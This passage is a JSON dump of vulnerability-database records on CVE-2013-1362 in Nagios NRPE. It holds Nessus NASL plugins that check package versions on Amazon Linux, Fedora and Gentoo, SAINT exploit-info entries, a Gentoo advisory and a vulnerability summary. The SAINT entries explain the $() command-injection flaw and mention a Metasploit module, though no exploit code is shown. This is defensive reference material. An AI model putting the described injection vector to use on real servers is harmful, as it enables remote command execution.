exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"nagios-plugins-nrpe-2.14-3.5.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"nrpe-2.14-3.5.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"nrpe-debuginfo-2.14-3.5.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nagios-plugins-nrpe / nrpe / nrpe-debuginfo\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:19:10", "bulletinFamily": "scanner", "description": "Update to 2.14 upstream to fix security issue. Misc other bugfixes.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-05T00:00:00", "id": "FEDORA_2013-9829.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67386", "published": "2013-07-12T00:00:00", "title": "Fedora 19 : nrpe-2.14-3.fc19 (2013-9829)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-9829.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67386);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/12/05 20:31:21\");\n\n script_cve_id(\"CVE-2013-1362\");\n script_bugtraq_id(58142);\n script_xref(name:\"FEDORA\", value:\"2013-9829\");\n\n script_name(english:\"Fedora 19 : nrpe-2.14-3.fc19 (2013-9829)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 2.14 upstream to fix security issue. Misc other bugfixes.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=916947\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-June/108394.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a8337f43\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nrpe package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Nagios Remote Plugin Executor Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"nrpe-2.14-3.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nrpe\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:21", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201408-18 (NRPE: Multiple Vulnerabilities)\n\n Multiple vulnerabilities have been discovered in NRPE. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker can utilize multiple vectors to execute arbitrary code.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2018-12-05T00:00:00", "id": "GENTOO_GLSA-201408-18.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77462", "published": "2014-08-30T00:00:00", "title": "GLSA-201408-18 : NRPE: Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201408-18.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77462);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2013-1362\", \"CVE-2014-2913\");\n script_bugtraq_id(58142, 66969);\n script_xref(name:\"GLSA\", value:\"201408-18\");\n\n script_name(english:\"GLSA-201408-18 : NRPE: Multiple Vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201408-18\n(NRPE: Multiple Vulnerabilities)\n\n Multiple vulnerabilities have been discovered in NRPE. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker can utilize multiple vectors to execute arbitrary\n code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201408-18\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All NRPE users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/nrpe-2.15'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Nagios Remote Plugin Executor Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-analyzer/nrpe\", unaffected:make_list(\"ge 2.15\"), vulnerable:make_list(\"lt 2.15\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"NRPE\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2016-12-14T16:58:03", "bulletinFamily": "exploit", "description": "Added: 05/13/2013 \nCVE: [CVE-2013-1362](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362>) \nBID: [58142](<http://www.securityfocus.com/bid/58142>) \nOSVDB: [90582](<http://www.osvdb.org/90582>) \n\n\n### Background\n\n[Nagios](<http://www.nagios.org>) is a network host and service monitoring and management system. Nagios Remote Plugin Executor (NRPE) is an addon for Nagios that allows remote execution of Nagios plugins on other Linux/Unix machines. \n\n### Problem\n\nNagios Remote Plugin Executor (NRPE) before 2.14, when compiled with `**--enable-command-args**` (usually set by default) contains a vulnerability that is triggered when input passed via `**$()**` is not properly sanitized before being used in plugins/scripts. If the plugins/ scripts are run under the bash shell, bash will execute that shell command and pass the output as a parameter to the called script. A remote attacker could exploit this vulnerability to execute arbitrary commands in the context of the NRPE/Nagios application. \n\n### Resolution\n\n[Upgrade](<http://sourceforge.net/projects/nagios/files/nrpe-2.x/>) to NRPE 2.14 or later. \n\n### References\n\n<http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=701227> \n\n\n### Limitations\n\nThis exploit was tested against Nagios Enterprises Nagios Remote Plugin Executor 2.13 on CentOS Project CentOS 6 (Exec-Shield Enabled). \n\nThe Perl modules [MIME::Base64](<http://search.cpan.org/~gaas/MIME-Base64-3.13/Base64.pm>) and [String::CRC32](<http://www.cpan.org/modules/by-module/String/>) are required to run the exploit. The Netcat utility (nc) must be installed on the target. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2013-05-13T00:00:00", "published": "2013-05-13T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/nagios_nrpe_addon_metacharacter_filtering", "id": "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "type": "saint", "title": "Nagios Remote Plugin Executor Metacharacter Filtering Omission", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "description": "Added: 05/13/2013 \nCVE: [CVE-2013-1362](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362>) \nBID: [58142](<http://www.securityfocus.com/bid/58142>) \nOSVDB: [90582](<http://www.osvdb.org/90582>) \n\n\n### Background\n\n[Nagios](<http://www.nagios.org>) is a network host and service monitoring and management system. Nagios Remote Plugin Executor (NRPE) is an addon for Nagios that allows remote execution of Nagios plugins on other Linux/Unix machines. \n\n### Problem\n\nNagios Remote Plugin Executor (NRPE) before 2.14, when compiled with `**--enable-command-args**` (usually set by default) contains a vulnerability that is triggered when input passed via `**$()**` is not properly sanitized before being used in plugins/scripts. If the plugins/ scripts are run under the bash shell, bash will execute that shell command and pass the output as a parameter to the called script. A remote attacker could exploit this vulnerability to execute arbitrary commands in the context of the NRPE/Nagios application. \n\n### Resolution\n\n[Upgrade](<http://sourceforge.net/projects/nagios/files/nrpe-2.x/>) to NRPE 2.14 or later. \n\n### References\n\n<http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=701227> \n\n\n### Limitations\n\nThis exploit was tested against Nagios Enterprises Nagios Remote Plugin Executor 2.13 on CentOS Project CentOS 6 (Exec-Shield Enabled). \n\nThe Perl modules [MIME::Base64](<http://search.cpan.org/~gaas/MIME-Base64-3.13/Base64.pm>) and [String::CRC32](<http://www.cpan.org/modules/by-module/String/>) are required to run the exploit. The Netcat utility (nc) must be installed on the target. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2013-05-13T00:00:00", "published": "2013-05-13T00:00:00", "id": "SAINT:E0F846270087DB671556237BDF17DDDE", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/nagios_nrpe_addon_metacharacter_filtering", "type": "saint", "title": "Nagios Remote Plugin Executor Metacharacter Filtering Omission", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:14", "bulletinFamily": "exploit", "description": "Added: 05/13/2013 \nCVE: [CVE-2013-1362](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362>) \nBID: [58142](<http://www.securityfocus.com/bid/58142>) \nOSVDB: [90582](<http://www.osvdb.org/90582>) \n\n\n### Background\n\n[Nagios](<http://www.nagios.org>) is a network host and service monitoring and management system. Nagios Remote Plugin Executor (NRPE) is an addon for Nagios that allows remote execution of Nagios plugins on other Linux/Unix machines. \n\n### Problem\n\nNagios Remote Plugin Executor (NRPE) before 2.14, when compiled with `**--enable-command-args**` (usually set by default) contains a vulnerability that is triggered when input passed via `**$()**` is not properly sanitized before being used in plugins/scripts. If the plugins/ scripts are run under the bash shell, bash will execute that shell command and pass the output as a parameter to the called script. A remote attacker could exploit this vulnerability to execute arbitrary commands in the context of the NRPE/Nagios application. \n\n### Resolution\n\n[Upgrade](<http://sourceforge.net/projects/nagios/files/nrpe-2.x/>) to NRPE 2.14 or later. \n\n### References\n\n<http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=701227> \n\n\n### Limitations\n\nThis exploit was tested against Nagios Enterprises Nagios Remote Plugin Executor 2.13 on CentOS Project CentOS 6 (Exec-Shield Enabled). \n\nThe Perl modules [MIME::Base64](<http://search.cpan.org/~gaas/MIME-Base64-3.13/Base64.pm>) and [String::CRC32](<http://www.cpan.org/modules/by-module/String/>) are required to run the exploit. The Netcat utility (nc) must be installed on the target. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2013-05-13T00:00:00", "published": "2013-05-13T00:00:00", "id": "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/nagios_nrpe_addon_metacharacter_filtering", "title": "Nagios Remote Plugin Executor Metacharacter Filtering Omission", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:50", "bulletinFamily": "unix", "description": "### Background\n\nNagios Remote Plugin Executor (NRPE) remotely executes Nagios plugins on other Linux/Unix machines. \n\n### Description\n\nMultiple vulnerabilities have been discovered in NRPE. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker can utilize multiple vectors to execute arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll NRPE users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/nrpe-2.15\"", "modified": "2014-08-30T00:00:00", "published": "2014-08-30T00:00:00", "id": "GLSA-201408-18", "href": "https://security.gentoo.org/glsa/201408-18", "type": "gentoo", "title": "NRPE: Multiple Vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2013-02-24T00:00:00", "published": "2013-02-24T00:00:00", "id": "SECURITYVULNS:VULN:12910", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12910", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
